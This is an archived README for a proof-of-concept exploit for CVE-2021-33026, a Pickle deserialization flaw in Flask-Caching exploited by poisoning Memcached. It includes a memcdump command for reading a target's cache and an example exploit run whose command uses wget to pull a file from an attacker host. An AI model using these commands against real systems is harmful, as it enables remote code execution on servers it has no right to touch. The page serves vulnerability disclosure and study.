Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-33026 PoC — Pallets Project Flask 代码问题漏洞

Source
https://github.com/CarlosG13/CVE-2021-33026
Associated Vulnerability
Title:Pallets Project Flask 代码问题漏洞 (CVE-2021-33026)
Description:The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code. NOTE: a third party indicates that exploitation is extremely unlikely unless the machine is already compromised; in other cases, the attacker would be unable to write their payload to the cache and generate the required collision
Description
Pickle Serialization Remote Code Execution - Memcached Poisoning
Readme
# CVE-2021-33026
Pickle Serialization Remote Code Execution - Memcached Poisoning PoC Exploit


**What's CVE-2021-3306?**

>"The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code."

**What's the Function of the Pickle Library?**

>"Pickle in Python is primarily used in serializing and deserializing a Python object structure. In other words, it's the process of converting a Python object into a byte stream to store it in a file/database, maintain program state across sessions, or transport data over the network."

**What's Memcached?**

> "Memcached is a general-purpose distributed memory-caching system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source must be read."

**[!] Exploitation:**

*1. In order to get the exploit to work it is necessary to provide a session cookie, why? In this proof of concept we have a case where the session cookie of a vulnerable Flask application is being managed or stored by the memcached service:*

```
memcdump --servers=target_machine_ip_address
```
![imagen](https://user-images.githubusercontent.com/69405457/140571838-908dff4e-6766-41a1-848e-62ccd83f643c.png)

*2. Exploit Usage:*

```-h --> help menu```

```--cmd --> Command to get executed on the target machine```

```--rhost --> Target Machine Ip Address```

```--rport --> Target Machine Port```

```--cookie --> Your ACTUAL SESSION COOKIE from the VULNERABLE FLASK Application. Example: session:58e61600-9ecf-45b8-b7b8-db2f0a00f421```

*3. Running the exploit:*

```
python3 cve-2021-33026_PoC.py --rhost $target_machine_ip_address --rport $target_machine_port --cmd "wget $attacker_ip/picke_memcached_posisoning_exploit" --cookie "session:58e61600-9ecf-45b8-b7b8-db2f0a00f421"
```
![imagen](https://user-images.githubusercontent.com/69405457/140569282-264e741c-c3b9-40c2-9837-7e06ea54677a.png)
![imagen](https://user-images.githubusercontent.com/69405457/140569333-c53e0a3e-4d00-4380-9856-f04769e896a8.png)


**Reference:**

https://nvd.nist.gov/vuln/detail/CVE-2021-33026

https://github.com/pallets-eco/flask-caching/pull/209

https://www.synopsys.com/blogs/software-security/python-pickling/
File Snapshot

 [4.0K]  /data/pocs/e3da83d641fcd2bae7d1dfa9576c18bf986c4d54
├── [1.4K]  cve-2021-33026_PoC.py
├── [1.0K]  LICENSE
└── [2.4K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →